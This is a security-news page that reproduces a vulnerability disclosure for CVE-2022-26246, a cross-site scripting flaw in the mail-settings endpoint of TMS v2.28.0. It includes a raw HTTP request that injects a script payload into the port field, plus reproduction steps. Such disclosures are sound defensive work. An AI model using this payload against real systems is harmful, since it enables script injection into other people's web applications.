Security
Headlines
HeadlinesLatestCVEs

Headline

CVE-2022-26246: There is a cross site scripting vulnerability exists in tms · Issue #15 · xiweicheng/tms

TMS v2.28.0 was discovered to contain a cross-site scripting (XSS) vulnerability in the component /TMS/admin/setting/mail/createorupdate.

CVE
#xss#vulnerability#web#windows#apple#js#git

[Suggested description]
Cross SIte Scripting (XSS) vulnerability exists in tms. The cause of the vulnerability is that the input data is not filtered in the foreground page /TMS/admin/setting/mail/ createorupdate, and the input parameters are directly passed into the setting method of AdminController and executed.

[Vulnerability Type]
Cross Site Scripting (XSS)

[Vendor of Product]
https://github.com/xiweicheng/tms

[Affected Product Code Base]
v2.28.0

[Affected Component]
POST /tms/admin/setting/mail/createOrUpdate HTTP/1.1
Host: localhost:8080
Content-Length: 113
sec-ch-ua: " Not A;Brand";v="99", “Chromium";v="92”
Accept: /
X-Requested-With: XMLHttpRequest
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://localhost:8080
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://localhost:8080/tms/admin/setting
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: JSESSIONID=CDC518A82EFF7D857356EBF9AB4206D2; locale=zh-cn; Hm_lvt_a4980171086658b20eb2d9b523ae1b7b=1645520663; Hm_lpvt_a4980171086658b20eb2d9b523ae1b7b=1645601594
Connection: close

host=smtp.163.com&port=25%3Cscript%3Ealert(%22xss%22)%3C%2Fscript%3E&username=someone%40163.com&password=&addr=&=

[Attack Type]
Remote

[Impact Code execution]
true

[Vulnerability proof]
1.Access URL: http://localhost:8080/tms/admin/setting , enter the system setting interface
image

2.Enter JS code in the form: <script> alert (“XSS”) </script >
image

image

3.Click Save to trigger a pop-up window, and the loophole reappearance is completed.
image

4.The cause of the vulnerability is that the input data is not filtered in the foreground page /TMS/admin/setting/mail/ createorupdate, and the input parameters are directly passed into the setting method of AdminController and executed.
image

image

CVE: Latest News

CVE-2023-50976: Transactions API Authorization by oleiman · Pull Request #14969 · redpanda-data/redpanda
CVE-2023-6905
CVE-2023-6903
CVE-2023-6904
CVE-2023-3907